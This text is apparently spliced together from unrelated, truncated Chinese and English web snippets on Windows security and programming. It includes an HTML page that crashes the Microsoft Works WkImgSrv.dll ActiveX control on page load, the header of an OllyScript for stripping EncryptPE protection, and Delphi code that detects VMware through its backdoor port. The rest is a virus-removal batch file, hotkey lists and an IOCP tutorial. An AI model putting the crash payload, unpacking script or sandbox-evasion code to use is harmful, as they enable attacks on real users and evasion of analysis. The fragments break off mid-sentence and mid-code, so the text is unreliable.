// 注意：须设置忽略0EEDFADE异常
//运行结束以后alt+l查看记录显示oep和rva信息
//如果是dll文件请自行先载入dll入od以后下硬件断点7120964C，再次载入dll再运行脚本
//脚本自动寻找OEP,修复IAT，跳过注册框，修复ReplaceCode，修复EmbeCode，自动保存RVA重定位数据

///////////////////////////////////////////////////////////////////////////////////
// FileName : EncryptPE_2007.12.1.txt
// Comment : EncryptPE V2.2007.12.1 S方式完美脱壳 0.2
// Environment : WinXP SP2,LifeDbg V1.4, OllyScript 1.65.2

SAN FRANCISCO -- Malicious hackers beware: Computer security expert Joel Eriksson might already own your box.

Eriksson, a researcher at the Swedish security firm Bitsec, uses reverse-engineering tools to find remotely exploitable security holes in hacking software. In particular, he targets the client-side applications intruders use to control Trojan horses from afar, finding vulnerabilities

Win PE深入研究
　　Windows PreInstallation Environment（Windows PE）直接从字面上翻译就是“Windows预安装环境”，微软在2002年7月22日发布，它的原文解释是：“Windows预安装环境（Windows PE）是带有限服务的最小Win32子系统，基于以保护模式运行的Windows XP Professional内核。它包括运行Windows安装程序及脚本、连接网络共享、自动化基本过程以及执行硬件验证所需的最小功能。”换句话说，你可把Windows PE看作是一个只拥有最少核心服务的Mini操作系统。微软推出这么一个操作系统当然是因为它拥有与众不同的系统功能，如果要用一句话来解释，我认为与 Win9X/2000/XP相比，Windows PE的主要不同点就是：它可以自定义制作自身的可启动副本，在保证你需要的核心服务的同

手动剿灭磁 碟 机完整步骤

准备工作：
1、WSYSCHECK、改扩展名为BAT文件，放桌面备用。
2、破坏DNSQ.DLL的指令保存为k.bat备用：
复制内容到剪贴板
代码:

attrib -r -s -h "%SystemRoot%\System32\dnsq.dll"
ren "%SystemRoot%\system32\dnsq.dll" "dnsq.d11.%random%"
echo MZ > "%SystemRoot%\System32\dnsq.dll"
attrib +s +r +h "%SystemRoot%\System32\dnsq.dll"

3、劫持代码,存为img.reg放桌面备用：
复制内容到剪贴板
代码:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

(下面排列按A-Z)顺序排列

一.win+(X)
其中win不会不知道吧,X为代码!
(1)Win+L 锁定当前用户.
(2)Win+E 资源管理器.
(3)Win+R 运行.
(4)Win+G （Gadgets）顺序切换边栏小工具.
(5)Win+U 轻松访问中心.
(6)Win+X Windows移动中心.
(7)Win+Tab 启用 3D窗口切换.
(8)Ctrl+Win+Tab 用键盘控制 Flip 3D窗口切换其中有个停顿效果.可以有足够的时间进行选择!
(9)Win+break 开启系统属性窗口.

二.Shell：command （外壳命令行）
以“Shell＋冒号＋命令”的格式，打开各种外壳文件夹:
(1)shell:AddNewProgramsFolder
(2)shell:Administrative Tools

program IsInVM;

{$APPTYPE CONSOLE}

uses
windows;

function InVMware: Boolean;
asm
XOR EAX, EAX

PUSH OFFSET @@Handler
PUSH DWORD PTR FS:[EAX]
MOV DWORD PTR FS:[EAX], ESP
MOV EAX, 564D5868h
MOV EBX, 3c6cf712h
MOV ECX, 0Ah
MOV DX, 5658h
IN EAX, DX
MOV EAX, True
JMP @@NotHandle
@@Handler:

用DELPHI开发网络代码已经有一段时间了！
我发现在网上用VC来实现完成端口（IOCP）的代码很多，但是使用DELPHI来实现的就比较少了。对IOCP讲的清楚的就更少了。在这里我把自己编写DELPHI下的IOCP写出来，希望对刚学完成端口的朋友有个帮助。
首先我们来了解一些在使用IOCP的时候需要使用的一些结构！
（1）：单IO数据结构
LPVOID = Pointer;
LPPER_IO_OPERATION_DATA = ^ PER_IO_OPERATION_DATA ;
PER_IO_OPERATION_DATA = packed record
Overlapped: OVERLAPPED;
DataBuf: TWSABUF;
Buffer: array [0..1024] of CHAR;
BytesSEND: DWORD;

dll版本7.03.0616.0

IE7+xpsp2 测试通过。

转载请注明出处并保持完整性，谢谢。
t4nk www.upx.com.cn
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language="JavaScript">
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>